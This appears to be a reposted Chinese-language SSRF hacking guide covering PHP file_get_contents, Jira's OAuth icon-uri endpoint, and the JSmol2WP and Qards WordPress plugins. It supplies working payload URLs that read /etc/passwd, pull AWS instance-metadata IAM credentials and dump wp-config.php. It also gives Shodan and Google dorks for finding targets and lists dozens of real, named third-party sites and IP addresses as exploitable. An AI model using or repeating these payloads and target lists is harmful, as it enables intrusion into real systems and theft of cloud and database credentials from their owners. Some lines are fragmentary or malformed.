https://robert-brook.com/parliament/index.php?page=http://www.parliament.uk/business/news/2019/parliamentary-news-2019/this-week-in-the-commons-friday-25-january-2019/
在这里,页面参数获取外部资源并显示其内容。
https://robert-brook.com/parliament/index.php?page=http://brutelogic.com.br/poc.svg
读取本地文件
https://robert-brook.com/parliament/index.php?page=file:///etc/passwd
当您尝试其他URL(如dict)时,会出错
警告:file_get_contents():无法找到包装器“dict” - 你是否忘记在配置PHP时启用它。
这表示未启用DICT URL结构
读取本地文件
Demo
https://youtu.be/OQBZ__L23KU
易受攻击的站点-
https://www.onlinevideoconverter.com/
https://www.files-conversion.com/
Repo链接:https://github.com/neex/ffmpeg-avi-m3u-xbin
Jira的SSRF
Jira版本号低于7.3.5正遭受SSRF的困扰
https:///plugins/servlet/oauth/users/icon-uri?consumerUri=…
在Shodan有4万多个JIRA站点。你可以利用下面的dork
X-AUSERNAME: anonymous
X-AUSERNAME: anonymous org:"Amazon.com" -- For aws
X-AUSERNAME: anonymous org:"Microsoft Azure" -- For Azure
X-AUSERNAME: anonymous org:"google" -- For Google
现在让我们看看一些易受攻击的站点
https://jira.majesco.com/plugins/servlet/oauth/users/icon-uri?consumerUri=https://google.com
https://jira.intellectdesign.com/plugins/servlet/oauth/users/icon-uri?consumerUri=https://google.com
https://team.asg.com/plugins/servlet/oauth/users/icon-uri?consumerUri=https://google.com
https://jira.magnitude.com/https://tickets.metabrainz.org/plugins/servlet/oauth/users/icon-uri?consumerUri=https://google.com
https://support.eu.evertz.com/jira/plugins/servlet/oauth/users/icon-uri?consumerUri=https://google.com
https://jira.dhis2.org/plugins/servlet/oauth/users/icon-uri?consumerUri=https://google.com
https://jira.vectormediagroup.com/plugins/servlet/oauth/users/icon-uri?consumerUri=http://169.254.169.254/latest/ -- Aws Details
https://mattel.cprime.com/jira/plugins/servlet/oauth/users/icon-uri?consumerUri=https://google.com
https://www.mfjira.io/plugins/servlet/oauth/users/icon-uri?consumerUri=https://google.com
http://adoptivefam.org/plugins/servlet/oauth/users/icon-uri?consumerUri=https://google.com
https://jira.iea-dpc.org/plugins/servlet/oauth/users/icon-uri?consumerUri=https://google.com
https://jira.fellowshipchurch.com:8443/plugins/servlet/oauth/users/icon-uri?consumerUri=https://google.com
https://jira.soleus.nu/plugins/servlet/oauth/users/icon-uri?consumerUri=https://google.com
http://jira.succraft.com:8080/plugins/servlet/oauth/users/icon-uri?consumerUri=https://google.com
https://tickets.metabrainz.org/plugins/servlet/oauth/users/icon-uri?consumerUri=https://google.com
http://support.make-my-day.co.nz/plugins/servlet/oauth/users/icon-uri?consumerUri=https://google.com
http://52.202.112.34/plugins/servlet/oauth/users/icon-uri?consumerUri=http://169.254.169.254/latest/meta-data/iam/security-credentials/SystemsManagerRole -- Aws Details
https://jira.canallabs.fr/plugins/servlet/oauth/users/icon-uri?consumerUri=http://169.254.169.254/latest/meta-data/profile -- Aws Details
http://54.247.191.19/plugins/servlet/oauth/users/icon-uri?consumerUri=http://169.254.169.254/latest/meta-data -- Aws Details
http://52.22.123.239/plugins/servlet/oauth/users/icon-uri?consumerUri=http://169.254.169.254/latest/meta-data -- Aws Details
http://52.22.123.239/plugins/servlet/oauth/users/icon-uri?consumerUri=http://169.254.169.254/latest/meta-data/identity-credentials/ec2/security-credentials/ec2-instance -- Aws Details
https://devops.deviate.net.nz/projects/plugins/servlet/oauth/users/icon-uri?consumerUri=http://169.254.169.254/latest/meta-data/identity-credentials/ec2/security-credentials/ec2-instance -- Aws Details
https://52.73.101.120/plugins/servlet/oauth/users/icon-uri?consumerUri=http://169.254.169.254/latest/meta-data/iam/security-credentials/BitbucketRole -- Aws Details
这是我发现的一些易受攻击的网站
低于1.07的JSmol2WP版本具有未经身份验证的服务器端请求伪造
http://localhost:8080/wp-content/plugins/jsmol2wp/php/jsmol.php?isform=true&call=getRawDataFromDatabase&query=php://filter/resource=../../../../wp-config.php
Dork -
inurl:wp-content/plugins/jsmol2wp
易受攻击的网站
https://www.vivelab12.fr/wp-content/plugins/jsmol2wp/php/jsmol.php?isform=true&call=getRawDataFromDatabase&query=php://filter/resource=../../../../wp-config.php -- DB details
http://thasso.com/wp-content/plugins/jsmol2wp/php/jsmol.php?isform=true&call=getRawDataFromDatabase&query=https://google.com -- Fetch google.com
http://www.ch.ic.ac.uk/rzepa/blog/wp-content/plugins/jsmol2wp/php/jsmol.php?isform=true&call=getRawDataFromDatabase&query=php://filter/resource=../../../../wp-config.php -- DB details
Qards容易受到服务器端请求伪造(SSRF)的攻击
http://target/wp-content/plugins/qards/html2canvasproxy.php?url=http://google.com
Dork-
inurl:wp-content/plugins/qards
易受攻击的网站 -
http://www.horlovia-chemicals.ch/wordpress/wp-content/plugins/qards/html2canvasproxy.php?url=http://google.com
https://vfsgroup.com.au/wp-content/plugins/qards/html2canvasproxy.php?url=http://google.com
https://mrgoatygelato.com.au/wp-content/plugins/qards/html2canvasproxy.php?url=http://google.com
https://arturolopezvalerio.com/wp-content/plugins/qards/html2canvasproxy.php?url=http://google.com
https://hooverwellness.com/wp-content/plugins/qards/html2canvasproxy.php?url=http://google.com
易受攻击的网站 -
https://pdfcrowd.com/#convert_by_input
https://convertio.co/html-pdf/
Ssrf.html的内容
">
">
以上发布的所有这些网站只是为了让您练习,作者不对任何滥用信息负责。
转自:https://mp.weixin.qq.com/s/fNQ-fsGJUlK2nWVBKI-boA